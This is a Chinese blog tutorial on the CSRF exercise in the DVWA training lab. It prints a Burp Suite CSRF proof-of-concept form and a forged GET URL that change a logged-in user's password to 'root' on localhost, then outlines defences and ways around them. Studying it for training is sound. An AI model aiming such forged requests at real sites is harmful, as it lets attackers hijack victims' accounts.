【渗透测试-web安全】DVWA-CSRF

最新推荐文章于 2022-11-16 23:07:42 发布
最新推荐文章于 2022-11-16 23:07:42 发布
阅读量585 收藏
点赞数
分类专栏: 网络安全 文章标签: 渗透测试 web安全 DVWA CSRF 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/harry_c/article/details/102859116
版权

【渗透测试-web安全】DVWA-CSRF

一、登录DVWA、设置安全级别为Low、进入CSRF

修改密码

在这里插入图片描述

抓包

在这里插入图片描述

使用burpsuite右键构造CSRF

	<html>
	  <!-- CSRF PoC - generated by Burp Suite Professional -->
	  <body>
	  <script>history.pushState('', '', '/')</script>
	    <form action="http://localhost/dvwa/vulnerabilities/csrf/">
	      <input type="hidden" name="password&#95;new" value="root" />
	      <input type="hidden" name="password&#95;conf" value="root" />
	      <input type="hidden" name="Change" value="Change" />
	      <input type="submit" value="ChangePassword" />
	    </form>
	  </body>
	</html

打开测试

在这里插入图片描述
点击修改密码成功:
在这里插入图片描述

二、CSRF构造解析

	通过抓包我们知道修改密码使用的是GET请求:

在这里插入图片描述
而且对应的网址为:

localhost/dvwa/vulnerabilities/csrf/?password_new=root&password_conf=root&Change=Change

	也就是说任何登录了这个站点的人点击访问构造的这个链接都会将密码改成root
	但是真的有人会点击这个链接吗?这不是侮辱智商
	所以就产生了我们之前的html代码,通过构造html来进行伪装将链接转换成我们无法识别的进行欺骗

三、防范与破解进阶

	之前我们使用的仅仅是Low等级的漏洞利用,

进阶防范1

设置refer请求头,非正常的请求头则拒绝对应的请求。

进阶破解之道1

其实请求头我们在自己构建站点的时候是可以模拟的,只需要将对应的站点根文件夹名称修改为正确的refer名称即可

进阶防范2

增加随机参数user_token这样攻击者在知道其他参数的情况下是无法知道token值的

进阶破解之道2

理论上我们的user_token也是可以暴力破解的(其实真的只是理论上的)

进阶防范3

如果说黑客能够破解对应的user_token那么修改密码的时候我们增加原密码进行校对,至此天衣无缝

Just_Do_Eat
关注
专栏目录
WEB安全渗透测试》(12)DVWACSRF实战
午夜安全
11-11 864
WEB安全渗透测试》(12)DVWACSRF实战 CSRF(Cross-site request forgery),跨站请求伪造,简写 CSRF/XSRF。指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。1)分析使用Burp抓包,看正常用户修改密码发送的请求。服务器端代码如下:...
渗透测试--DVWA命令注入
qq_45070118的博客
07-30 1837
DVWA 命令注入:利用各种调用系统命令的web应用,通过命令拼接、绕过黑名单等方式实现在服务端实现想要实现的系统命令。 如何配置登陆看我的burpsuite爆破文章中就有 这次我分为linux和windows两个版本登录时分别把登陆网址的IP改为目标系统的IP即可 DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应...
DVWA靶机通关系列--3.CSRF(跨站点请求伪造)(解题思路+审计分析)
ElsonHY的博客
12-14 568
DVWA靶机通关系列--3.CSRF(跨站点请求伪造)(解题思路+审计分析)前言0x01 CSRF(跨站点请求伪造)CLASS LOWCLASS:MEDIUMCLASS:HIGH总结 前言 这时肯定有小伙伴要说了,“哎呀你怎么第二关的命令注入还没讲就直接讲第三关了???小R你不讲5的,我劝你耗子尾汁……” 开个玩笑,因为最近面试经常被问到关于CSRF的问题,也重新对该部分的理论基础复习了一下,想着趁热打铁,先写这一部分,这样写的过程思路也可能会相对清晰一点,下一篇一定写第二关= =(狗头保命)。 B
【工具-DVWADVWA渗透系列三:CSRF
qqchaozai的专栏
10-21 2346
前言 DVWA安装使用介绍,见:【工具-DVWADVWA的安装和使用 本渗透系列包含最新DVWA的14个渗透测试样例: 1.Brute Force(暴力破解)2.Command Injection(命令注入)3.CSRF(跨站请求伪造)4.File Inclusion(文件包含)5.File Uploa...
DVWA靶机-跨站请求伪造(CSRF)
weixin_43726831的博客
10-22 1188
DVWA靶机-跨站请求伪造(CSRF) 引入:SQL注入是一种后端的攻击行为,通过浏览器发出请求,基于http/https协议将数据送给对方服务器,服务器通过WEB容器,将数据进行解析,实现与数据库的交互,CSRF是一种前端的注入。 CSRF攻击 CSRF(Cross-Site Request Forgery)是一种前端的注入,译为跨站请求伪造。 浏览器的同源策略:(Same origin pol...
PHP代码审计入门-DVWA靶场CSRF
身高两米不到的博客
11-16 1139
从零学习php,最终目的实现代码审计入门,软件采用sublime text,环境使用phpstudy搭建,数据库是navicat,需要有基本的前端基础、简单的php+mysql后端基础、渗透知识和漏洞原理,文章跟随流沙前辈学习记录,看看曾经遥不可及的代码审计能不能慢慢啃下来。好的,文章内容代码不是重点,重点是逻辑和漏洞。然后产生疑惑, &dvwaSessionGrab函数为什么要加& ,百度一番没看懂,吐槽一下:他喵的就不能用朴实无华的语言写出来,非得装杯。因为什么限制也没做。
渗透测试-web安全】基于DVWA测试实战环境搭建
harry_c的博客
10-24 1032
渗透测试-web安全】基于DVWA测试实战环境搭建本地搭建php环境DVWA的安装下载解压安装修改配置信息安装点击创建数据库进入登录页面账号密码DVWA测试内容介绍 除了DVWA外还有DSVW大家可以自行查找相关资料,后面有时间我也可能会写相关的教程 本地搭建php环境 这里我们利用最简单的集成环境,phpstudy(我们也可以用tomcat或者其他的服务创建web环境)。 首选访问 phps...
网络安全 - Web 安全靶场 - DVWA-2.3.zip
最新发布
10-09
DVWA(Damn Vulnerable Web Application)是一个专为网络安全专业人员设计的PHP/MySQL Web应用程序,旨在提供一个合法且安全的环境,用于测试专业技能和工具。此资源包(DVWA-2.3.zip)包含了DVWA的2.3版本,这个...
渗透测试初学者资源 DVWA压缩包
12-23
渗透测试网络安全领域中一项重要的技能,主要用于模拟黑客攻击,以评估系统安全防护能力。DVWA(Damn Vulnerable Web ...记住,安全测试不仅仅是找到漏洞,更重要的是理解它们的工作原理,以便有效地预防和修复。
DVWA--CSRF(全难度)
wwxxee
02-20 1108
DVWACSRF(跨站请求伪造) 原理参考:网络安全笔记-99-渗透-CSRF 逻辑 在输入框中输入新密码,可修改当前用户的密码。 难度分级 Low 通过BP抓包,可以发现修改密码的请求是GET方式,直接修改GET请求参数就可以完成密码修改。 只要访问该链接即可修改密码: http://192.168.17.141/DVWA/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change 在BP里
Web漏洞实战教程(DVWA的使用和漏洞分析)
10-30
1. WINDOWS环境准备 4 1.1 IIS安装 5 1.2 PHP安装 6 1.3 MYSQL服务器安装 14 1.4 DVWA安装 21 2. LINUX环境准备 25 3. 实战演练 25 3.1 实验须知 25 3.2 COMMAND EXECUTION VULNERABILITY 27 3.2.1 漏洞介绍 27 3.2.2 攻击实战 27 3.2.3 PHP源
[实验]csrf dvwa
foolisheddy
03-21 2818
dvwa low 级别测试 源代码 构造链接 dvwa medium 级别测试 源代码 漏洞利用 dvwa high 级别测试 源代码 漏洞利用 dvwa Impossible 级别测试 源代码 漏洞利用 参考list tips 新知识点清单 token php语法 语法作用 短链接 Anti-CSRF token机制 授权与未授权 请求域与Cookie信息所指定的域域dvwa low 级别测试:源
【无标题】使用dvwa环境进行csrf漏洞练习
qq_48744846的博客
04-13 292
Low: 通过Burpsuite抓取修改密码的报文 右键选择Engagement tools—>Generate CSRF PoC 生成构造好的攻击脚本,value就是要修改的密码 拷贝到根目录下 访问该html,并点击Submit request 密码修改成功 ...
渗透测试-web安全DVWA-命令注入
harry_c的博客
10-28 686
渗透测试-web安全DVWA-命令注入一、实操二、怎么解决没有回显的命令注入延时注入远程请求三、防范命令注入 一、实操 设置low等级 使用功能 我们发现功能是直接使用输入IP地址系统反馈ping命令的结果 首先测试 127.0.0.1 使用命令拼接:127.0.0.1&&dir 很简单就实现了命令注入,当然这是简单的等级,其他级别自行尝试,有问题可以私信我的CS...
DVWACSRF(跨站请求伪造)
ximo的博客
01-28 474
DVWACSRF(跨站请求伪造) 目录DVWACSRF(跨站请求伪造)原理低等级一般方法利用poc实现结合存储型XSS利用中等级高等级与XSS进行比较 原理 利用受害者尚未失效的身份认证信息、会话;诱骗其访问黑客设计好的页面,在受害人不知情的情况下以受害人的身份向服务器发送请求,完成非法操作。 框图: 低等级 一般方法 当前登录用户:1337 进行抓包: 构造恶意链接发送给受害者并使其访问: 当前登录用户:admin 访问恶意链接: 密码已被修改。 利用poc实现 抓包获取信息,右键选择poc生
DVWA实战测试CSRF
0xdawn的博客
01-30 443
0x01 Low级别 源码分析 <?php if( isset( $_GET[ 'Change' ] ) ) { // Get input $pass_new = $_GET[ 'password_new' ]; $pass_conf = $_GET[ 'password_conf' ]; // Do the passwords match? ...
DVWA靶场通关(CSRF
m0_56010012的博客
04-05 3256
CSRF(Cross-site request forgery),翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。 CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用。而最常见的就是QQ空间的登陆。 CSRF属于业务逻辑漏洞,服务器信任经过身份认证的用户。 XSS属于技术漏洞,客
DVWACSRF漏洞(详细)
热门推荐
qq_44720671的博客
07-26 2万+
CSRF简介 csrf全称为:Cross-site request forgery,是一种常见的web攻击。在场景中,攻击者会伪造一个请求(通常是一个链接),然后欺骗目标用户点击,用户一旦点击,攻击也就完成了。 与xss的区别:csrf是借助用户的权限完成攻击,攻击者并没有拿到权限;而xss是直接盗取用户权限去进行破坏。 更改难度: 点击dvwa security,选择难度,然后点击submit...
DVWA下的CSRF攻防实战(详解)
一期一会的博客
04-20 4761
DVWA下的CSRF攻防实战(详解) 我们简单谈一谈CSRF与XSS的区别: CSRF (cross site request forgery)跨站请求伪造。CSRF是用户在不知情的情况下提交请求,而XSS是用户自己点击链接来访问网页。 整个攻击过程: 用户浏览并登录受信任网站A(dvwa),登录成功以后网站A会返回浏览器的信息中带有已登录的cookie,cookie信息会在浏览器端保存一定时间(根据浏览器设置而定),在用户没有退出网站A的情况下访问恶意站点B(这里在win2003制作一个危险网站),该危
DVWA漏洞测试平台:渗透测试的实战工具介绍
资源摘要信息:"DVWA(Damn Vulnerable Web Application)是一个故意设计了各种安全漏洞的Web应用程序,主要目的是为了教育培训和渗透测试实践提供一个合法且安全的环境。该平台使用PHP和MySQL进行开发,它模拟了一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值